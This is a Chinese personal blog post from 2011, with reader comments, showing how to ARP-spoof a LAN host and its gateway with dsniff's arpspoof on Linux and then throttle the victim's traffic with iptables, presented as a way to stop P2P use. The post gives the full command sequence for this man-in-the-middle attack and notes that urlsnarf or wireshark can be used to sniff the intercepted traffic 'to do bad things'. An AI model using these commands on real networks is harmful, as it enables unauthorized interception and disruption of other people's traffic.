FreeTstar

loving Freedom + + loving Linux

  • 首页
  • Archive
  • 关于
  • 杂七杂八
  • 留言板
Twitter Sina RSS

linux下限制局域网内部使用p2p软件的主机

发布于 2011年11月7日 由 freetstar
6 条评论发表评论

windows下有p2p终结者,linux下咱有dsniff,介绍:here,其的用途之一就是做arp欺骗,具体命令是arpspoof.

作用:

arpspoof将局域网内的目标主机或者是所有主机的发送数据包通过ARP欺骗来重指向。在使用交换机的局域网环境下是一个非常有效的方法来嗅探数据:)

注意:kernel的ip转发必须要提前打开

使用:

arpspoof [-i interface] [-t target] host
-i 用来指示要使用的网卡接口,一般是eth0,
-t 用来指示要欺骗的目标主机,如果不表明则默认为局域网内部的所有主机
host 你要截取数据包的主机,通常是网关

具体使用:

环境archlinux ,要限制的ip为192.168.0.29,本机ip为192.168.0.24,实验室网管为192.168.0.1

1 安装

sudo pacman -S dsniff

2 开启内核转发和欺骗

#echo 1 > /proc/sys/net/ipv4/ip_forward

#欺骗192.168.0.29,告诉这台机器网关192.168.0.1的MAC地址是自己(192.168.0.24)。

$sudo arpspoof -i eth0 -t 192.168.0.29 192.168.0.1

#欺骗192.168.0.1,告诉网关192.168.0.29的MAC地址是自己(192.168.0.24)

$sudo arpspoof -i eth0 -t 192.168.0.1 192.168.0.29

192.168.0.29以为192.168.0.24就是192.168.0.1,192.168.0.1以为192.168.0.24就是192.168.0.29

3 利用iptables开始限速

#192.168.0.29被限制每秒只能传输3个数据包了

$sudo iptables -A FORWARD -s 192.168.0.29  -m limit --limit 3/s -j ACCEPT           $sudo iptables -A FORWARD -d 192.168.0.29 -m limit --limit 3/s -j ACCEPT                  $sudo iptables -A FORWARD -s 192.168.0.29  -j DROP                                                 $sudo iptables -A FORWARD -d 192.168.0.29  -j DROP   

4 当然,如果你想干坏事的话可以用 urlsnarf 或者wireshark之类的。。。。恩

 

参考资料:

http://microcai.gsalex.net/archives/2010/11/p2p-killer-for-linux.html

http://www.yuanma.org/data/2006/0914/article_1536.htm

分类:服务器
推荐几本好书
小说Python中的while/for循环后的else

6 则回应给 “linux下限制局域网内部使用p2p软件的主机”

  1. 平板电脑推荐 CHINA Mozilla Firefox Windows 说道:
    2012年02月12日 3:16 下午

    看来是RSS抽风了,我又来了一次,上面的下载盒子就是我

    [回复]

  2. Mucid UNITED STATES Mozilla Firefox Ubuntu Linux 说道:
    2012年02月12日 11:04 上午

    要是安ARP防火墙呢~~

    [回复]

    freetstar CHINA Mozilla Firefox Linux 回复:
    二月 19th, 2012 at 9:50 上午

    @Mucid, 那就很难了

    [回复]

  3. 囧啊囧at下载盒子 CHINA Mozilla Firefox Windows 说道:
    2011年11月22日 3:27 下午

    好邪恶

    [回复]

  4. maplebeats CHINA Mozilla Firefox Linux 说道:
    2011年11月13日 12:27 上午

    好坏,我干这些一般都是直接进路由器里 :mrgreen:

    [回复]

    freetstar CHINA Mozilla Firefox Linux 回复:
    二月 19th, 2012 at 9:49 上午

    @maplebeats, 实验室的是交换机。。

    [回复]

发表评论 取消回复

电子邮件地址不会被公开。 必填项已用 * 标注

*

*


疑问 开心 悲伤 邪恶 惊叹 微笑 脸红 笑 惊讶 惊奇 迷惑 酷 憨笑 生气 阴险 转眼球 眨眼 主意 箭头 中立 哭 大笑

您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

*
To prove you're a person (not a spam script), type the security word shown in the picture.
Anti-spam image

点击取消回复
第 1 页,共 1 页1
  • 欢迎订阅

  • Github

  • 近期评论

    • Dr.Rider CHINA Mozilla Firefox Linux 发表在《中国移动咪咕音乐 Linux版发布》
    • freetstar CHINA Mozilla Firefox Linux 发表在《linux下限制局域网内部使用p2p软件的主机》
    • freetstar CHINA Mozilla Firefox Linux 发表在《ubuntu10.04 安装卸载KDE桌面之折腾记》
    • freetstar CHINA Mozilla Firefox Linux 发表在《linux下限制局域网内部使用p2p软件的主机》
  • Spread Firefox Affiliate Button
  • 我的豆瓣

  • 链接表

    • 51开源社区
    • Adam's
    • delectate's blog
    • Don's
    • Embest工作室
    • fl
    • ghostunix
    • Jasey Wang
    • Jerry's Blog
    • Moolight@Ericyue
    • OSMSG
    • OurUnix
    • panda
    • Pity is the Bomp
    • PT ubuntu
    • Tao Zhu
    • ubuntuhome
    • ubuntusoft
    • WOW!ubuntu
    • zhangzhfang
    • 丕字的blog
    • 傻东の学习笔记
    • 奶牛的blog
    • 孤风颠影
    • 灵亦
    • 熊猫党军委主席
    • 靖 轩
    • 马力哥
    • 黑孩儿
  • 我的支付宝

  • 功能

    • 登录
    • 文章 RSS
    • 评论 RSS
    • WordPress.org
© FreeTstar. WordPress 强力驱动 | Nest Theme by YChong